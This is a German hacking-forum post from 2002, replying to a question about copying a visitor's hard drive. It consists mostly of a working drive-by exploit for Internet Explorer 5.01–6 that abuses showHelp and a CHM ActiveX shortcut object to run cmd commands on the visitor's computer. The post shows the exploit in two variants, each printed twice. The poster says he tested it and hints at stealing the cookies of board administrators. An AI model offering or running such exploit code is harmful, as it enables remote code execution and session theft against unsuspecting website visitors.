HD kopieren

[C.T.X]-ebr!s- · 17.11.2002, 23:01

lol monro du hast immer die ausgefallensten fragen auf lager respekt digga

also duch schwachstelle im IE von version 5.01 bis 6.028 kann einem webmaster ermöglichen auf persönliche daten des besuchers zuzugreifen, aber das zugreifen funktioniert nicht wie bei einem troja wo du machen kannst was du willst, sondern im javascript muss du vorher einstellen was das script genau machen muss. aber diese einstellung könnte dir weiterhelfen hehe
hier ein script das ich selbst getestet habe und es geht:

<script>
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:') ");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>

<HTML>
<BODY>
<script>
prog = 'cmd';
args = '/k net send * ..spieletermine..Networks..visit..us...www.google. de...';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:') ");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
</BODY>
</HTML>

naja ganze HD zu kopieren würde ich nicht unbedigt empfehlen *g* aber was ganz interessant ist, sind cookies wenn der besucher z.B. admin von irgend einem board ist, den rest kannst du dir ja denken.......

17.11.2002, 23:01	- 1
[C.T.X]-ebr!s- Neuer Benutzer Registriert seit: 16.07.2002 Beiträge: 0 Abgegebene Danke: 0 Erhielt 0 Danke für 0 Beiträge	lol monro du hast immer die ausgefallensten fragen auf lager respekt digga also duch schwachstelle im IE von version 5.01 bis 6.028 kann einem webmaster ermöglichen auf persönliche daten des besuchers zuzugreifen, aber das zugreifen funktioniert nicht wie bei einem troja wo du machen kannst was du willst, sondern im javascript muss du vorher einstellen was das script genau machen muss. aber diese einstellung könnte dir weiterhelfen hehe hier ein script das ich selbst getestet habe und es geht: <script> prog = 'cmd'; args = '/k echo You are vulnerable (Sandblad #10) & '+ 'echo Sandblad #10 > c:/vulnerable.txt & winmine'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:') "); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=","+prog+","+args+""></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> <HTML> <BODY> <script> prog = 'cmd'; args = '/k net send * ..spieletermine..Networks..visit..us...www.google. de...'; if (!location.hash) { showHelp(location+"#1"); showHelp("iexplore.chm"); blur(); } else if (location.hash == "#1") open(location+"2").blur(); else { f = opener.location.assign; opener.location="res:"; f("javascript:location.replace('mk:@MSITStore:C:') "); setTimeout('run()',1000); } function run() { f("javascript:document.write('<object id=c1 classid=clsid:adb"+ "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+ "=ShortCut><param name=Item1 value=","+prog+","+args+""></"+ "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+ "-00aa003b7a11><param name=Command value=Close></object>')"); f("javascript:c1.Click();c2.Click();"); close(); } </script> </BODY> </HTML> naja ganze HD zu kopieren würde ich nicht unbedigt empfehlen g aber was ganz interessant ist, sind cookies wenn der besucher z.B. admin von irgend einem board ist, den rest kannst du dir ja denken.......

HD kopieren

[C.T.X]-ebr!s-